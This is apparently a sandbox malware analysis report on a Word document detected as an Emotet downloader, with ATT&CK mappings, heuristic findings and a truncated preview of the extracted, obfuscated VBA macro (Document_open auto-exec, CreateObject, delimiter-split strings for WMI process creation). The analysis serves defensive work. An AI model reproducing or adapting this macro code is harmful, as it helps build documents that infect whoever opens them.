MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1059 Command and Scripting Interpreter
T1203 Exploitation for Client Execution
The sample contains VBA macros, specifically a Document_Open macro that utilizes CreateObject, indicating an attempt to execute arbitrary code. ClamAV detection as 'Doc.Downloader.Emotet-9778165-0' strongly suggests Emotet family. The VBA script's primary function appears to be downloading and executing a secondary payload, a common tactic for Emotet.
Heuristics 6
-
ClamAV: Doc.Downloader.Emotet-9778165-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-9778165-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.basaa3822bbb419da819c0009ca2a50458591c2a917d376ecb16e3e87f227973bcb |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10774 bytes |
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "C36qwyoi5aq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
Fvpfw4ruu27u65_et.Aiei4ftiuv3b
End Sub
Attribute VB_Name = "F2udz5z_ag37c7v"
Function Nv1c_15b7oobuwh(Wlnsrkqx8prxmqba1a)
On Error Resume Next
ReDim TviHMN(2)
TviHMN(0) = 946 + 9 + 5 + 2166 + 79571
TviHMN(1) = 134 + 568 + 254 + 11 + 3
ReDim awkHa(3)
awkHa(0) = 6 + 5 + 2521 + 5917 + 51
awkHa(1) = 8226 + 4789 + 168 + 3 + 51
awkHa(2) = 56 + 9572 + 9 + 3 + 4654
ReDim ydsBGAm(2)
ydsBGAm(0) = 97 + 137 + 3 + 8 + 85191
ydsBGAm(1) = 5164 + 3 + 527 + 4 + 7
Nv1c_15b7oobuwh = Join(Wlnsrkqx8prxmqba1a, I03ebne9p2axgk)
ReDim SHfJdE(3)
SHfJdE(0) = 2 + 468 + 4946 + 388 + 291
SHfJdE(1) = 69 + 612 + 2585 + 86 + 571
SHfJdE(2) = 12 + 7 + 4 + 7018 + 111
ReDim JljUDNJNW(2)
JljUDNJNW(0) = 904 + 177 + 2 + 2 + 11
JljUDNJNW(1) = 446 + 489 + 5464 + 617 + 943
ReDim qZkXII(1)
qZkXII(0) = 69 + 70 + 2389 + 764 + 6
End Function
Function Invdvxc0ig7vu4hps(Kzdao4jkbsz)
On Error Resume Next
ReDim iuWSMmRDj(3)
iuWSMmRDj(0) = 365 + 7342 + 1 + 3 + 3401
iuWSMmRDj(1) = 318 + 1 + 1 + 7 + 1321
iuWSMmRDj(2) = 48 + 686 + 6 + 8913 + 6630
ReDim IiTPuJ(1)
IiTPuJ(0) = 26 + 331 + 7 + 76 + 85
ReDim ANCIFHD(3)
ANCIFHD(0) = 927 + 787 + 48 + 9451 + 2921
ANCIFHD(1) = 3 + 8326 + 66 + 54 + 541
ANCIFHD(2) = 584 + 516 + 8492 + 5165 + 293
Set Invdvxc0ig7vu4hps = CreateObject(Kzdao4jkbsz)
ReDim cllhQiAJ(2)
cllhQiAJ(0) = 7 + 913 + 35 + 254 + 61
cllhQiAJ(1) = 5912 + 6722 + 9199 + 801 + 1584
ReDim cmNMSqECB(3)
cmNMSqECB(0) = 94 + 26 + 4086 + 688 + 81
cmNMSqECB(1) = 71 + 109 + 12 + 265 + 11
cmNMSqECB(2) = 9728 + 221 + 2 + 714 + 7
ReDim QqRcQBmL(3)
QqRcQBmL(0) = 17 + 43 + 6 + 6 + 21
QqRcQBmL(1) = 8 + 9 + 15 + 9 + 171
QqRcQBmL(2) = 9 + 4 + 4225 + 178 + 402
End Function
Function M2g62vf646rjb79xz(Paxwyv2f721eh)
On Error Resume Next
ReDim kioDH(2)
kioDH(0) = 934 + 38 + 728 + 2 + 9761
kioDH(1) = 6 + 36 + 2 + 812 + 3
ReDim ILoZEcn(2)
ILoZEcn(0) = 64 + 1 + 59 + 617 + 11
ILoZEcn(1) = 1 + 5 + 443 + 4 + 907
ReDim BPTUC(2)
BPTUC(0) = 3 + 3 + 52 + 6 + 91
BPTUC(1) = 6869 + 93 + 5 + 637 + 10
M2g62vf646rjb79xz = Split(Paxwyv2f721eh, "=uKNBSYw")
ReDim xGMMDFIWG(3)
xGMMDFIWG(0) = 2406 + 410 + 52 + 3 + 61
xGMMDFIWG(1) = 2 + 6 + 80 + 540 + 66841
xGMMDFIWG(2) = 15 + 327 + 8 + 1 + 2
ReDim gJlAEF(1)
gJlAEF(0) = 7030 + 1 + 325 + 1 + 54
ReDim YeJoLs(1)
YeJoLs(0) = 7044 + 21 + 6 + 30 + 2104
End Function
Attribute VB_Name = "Fvpfw4ruu27u65_et"
Attribute VB_Base = "0{4271DA0E-52DA-4D8D-99B7-EEE2D7B14DF3}{0E2A116A-BF36-4853-A453-279196DF29B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Aiei4ftiuv3b()
On Error Resume Next
ReDim dwvfSAS(1)
dwvfSAS(0) = 5529 + 3 + 2327 + 33 + 7
ReDim CTDsvw(2)
CTDsvw(0) = 609 + 202 + 8 + 6408 + 7651
CTDsvw(1) = 1 + 3 + 2 + 6 + 7
ReDim bDKhDCI(2)
bDKhDCI(0) = 6 + 33 + 63 + 15 + 42951
bDKhDCI(1) = 1243 + 94 + 7884 + 37 + 2
Max_9buif6cvev1pe = Dubcqthbvk16542 + "=uKNBSYwro=uKNBSYw=uKNBSYwce=uKNBSYws=uKNBSYws=uKNBSYw" + Rr4jub9t2t0qf
ReDim vbNGMGFcG(3)
vbNGMGFcG(0) = 4 + 825 + 7047 + 5836 + 591
vbNGMGFcG(1) = 8 + 4 + 7 + 2 + 54521
vbNGMGFcG(2) = 51 + 639 + 6 + 683 + 1
ReDim iPJcA(1)
iPJcA(0) = 1900 + 6 + 5 + 80 + 636
ReDim OExaZBX(1)
OExaZBX(0) = 2 + 3 + 7464 + 6790 + 4
Ak8knvj9g74fw = Fsmh5w9h3cd + "=uKNBSYw=uKNBSYw:=uKNBSYww=uKNBSYwin=uKNBSYw=uKNBSYw3=uKNBSYw2=uKNBSYw_=uKNBSYw" + N8_7rfso_7utcdwtm
ReDim XgLwq(2)
XgLwq(0) = 5 + 558 + 890 + 4 + 311
XgLwq(1) = 7862 + 37 + 1 + 4 + 6
ReDim JFAdOHOs(1)
JFAdOHOs(0) = 3 + 7 + 82 + 4 + 5
ReDim ouQtFI(3)
ouQtFI(0) = 3 + 9118 + 64 + 293 + 1941
ouQtFI(1) = 21 + 9 + 418 + 417 + 401
ouQtFI(2) = 95 + 7 + 9 + 271 + 8768
Paxwyv2f721eh = P37rch
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.